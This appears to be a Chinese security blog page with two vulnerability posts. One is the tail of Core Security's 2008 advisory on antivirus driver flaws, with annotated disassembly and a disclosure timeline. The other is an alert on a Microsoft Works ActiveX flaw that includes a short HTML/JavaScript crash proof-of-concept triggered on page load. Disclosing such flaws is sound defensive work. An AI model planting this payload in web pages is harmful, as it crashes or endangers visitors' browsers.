.text:00010EC7 jnz short loc_10ECE
.text:00010EC9
.text:00010EC9 loc_10EC9: ; CODE XREF: sub_10EAA+37_j
.text:00010EC9 push [ebp+ClientId]
.text:00010ECC jmp short loc_10EF0

.text:00010ECE
.text:00010ECE loc_10ECE: ; CODE XREF: sub_10EAA+1D_j
.text:00010ECE call PsGetCurrentProcessId
.text:00010ED3 mov ecx, dword_11C80
.text:00010ED9 push eax
.text:00010EDA call sub_11070
.text:00010EDF test al, al
.text:00010EE1 jnz short loc_10EC9
.text:00010EE3 call PsGetCurrentProcessId
.text:00010EE8 mov edi, [ebp+ClientId] ; Here is the bug, if
ClientId is pointing to an invalid address
.text:00010EEB cmp eax, [edi] ; it will crash.
.text:00010EED jnz short loc_10F0D

- ———–/

*Report Timeline*

. 2008-01-11: Core Security Technologies found a security vulnerability
in BitDefender antivirus.
. 2008-01-14: BitDefender team is contacted by Core.
. 2008-01-15: BitDefender team asks Core for technical description of
the vulnerability.
. 2008-01-15: Technical details are sent to BitDefender team by Core.
. 2008-01-22: BitDefender notifies Core that a fix has been produced and
the flaw was corrected through automatic updates.
. 2008-02-04: According to the original schedule, the CORE-2008-0320
advisory would be released at this date, but similar flaws in other
antivirus products were discovered by Core exploit writers team.
Considering all BitDefender users are patched, Core Security
Technologies does not release the advisory and continues the research of
this issue in other products.
. 2008-03-20: Core analyzes similar vulnerabilities in Comodo Firewall,
Sophos Antivirus and Rising Antivirus.
. 2008-03-25: Core notifies the Comodo, Sophos and Rising teams of the
vulnerabilities.
. 2008-03-27: Comodo team asks Core for technical description of the
vulnerability.
. 2008-03-27: Technical details are sent to Comodo team by Core.
. 2008-03-31: Rising team asks Core for technical description of the
vulnerability.
. 2008-04-01: Technical details are sent to Rising team by Core.
. 2008-04-02: Rising team inform Core that the flaw has been fixed in
the Rising AV 2008 version.
. 2008-04-02: Sophos team asks Core for technical description of the
vulnerability.
. 2008-04-07: Technical details are sent to Sophos team by Core.
. 2008-04-11: Sophos team informs that the flaw is found in one of the
antivirus drivers, and fixing it will require a reboot for all of Sophos
Windows customers. Sophos would like to fix the bug in the next major
version (second quarter 2009), in particular considering the fact that
they were unable to come up with any practical use of this vulnerability.
. 2008-04-14: Comodo notifies Core that a fix has been produced.
. 2008-04-14: Sophos informs Core that they will be able to release a
fix to the vulnerability at the end of October 2008.
. 2008-04-21: Core responds that they will reschedule the publication to
April 24th, 2008. Since the vulnerability is not critical, and has been
found using publicly available tools, like the other vulnerabilities
included in the advisory, Core doesn’t see a reason to postpone the
publication of the Sophos bug until October 2008.
. 2008-04-21: Sophos asks Core not to release details of the
vulnerability until a fix is available, and not to publish Proof of
Concept code. Sophos informs that they do not believe that arbitrary
code execution is possible.
. 2008-04-24: Core responds that the advisory does not contain Proof of
Concept code. Core confirms its intention of publishing the advisory,
including the technical description, but decides to postpone it to April
28th, to give the participants more time to coordinate the release of
public information.
. 2008-04-25: Sophos provides additional information, included in the
“vendor information” section of the advisory.
. 2008-04-28: CORE-2008-0320 advisory is published.

*References*

[1] http://www.bitdefender.com
[2] http://www.comodo.com
[3] http://www.sophos.com
[4] http://www.rising-global.com
[5] http://www.matousec.com/downloads
[6]
http://www.matousec.com/info/articles/plague-in-security-software-driver
s.php

*About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.

*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company’s flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.

*Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.

Popularity: 100% [?]

漏洞公告 GreySign 29 Apr 2008 No Comments

警惕:又一个IE0DAY漏洞

发布日期:2008-4-17

最后更新日期:2008-4-17   2137GMT

近几天网络上流传着一个传说为IE0DAY的POC代码,在XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部分的XP预装了Microsoft Works,所以就出现了过全补丁系统的漏洞(如华硕易PC 就预装了Microsoft Works)。影响的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0)以下为crash POC,来自:http://hi.baidu.com/nansec/blog/item/299edffcd582d4f8fc037fb9.html

<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language=”JavaScript”>
    function payload() {
             var num = -1;
             obj.WksPictureInterface = num;
             }
   </script>
</head>
<body onload=”JavaScript: return payload();”>
<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
</object>
</body>
</html>

来自:知道安全

Popularity: 50% [?]

漏洞公告 GreySign 17 Apr 2008 No Comments

Next Page »

Recommended: Buy movies online.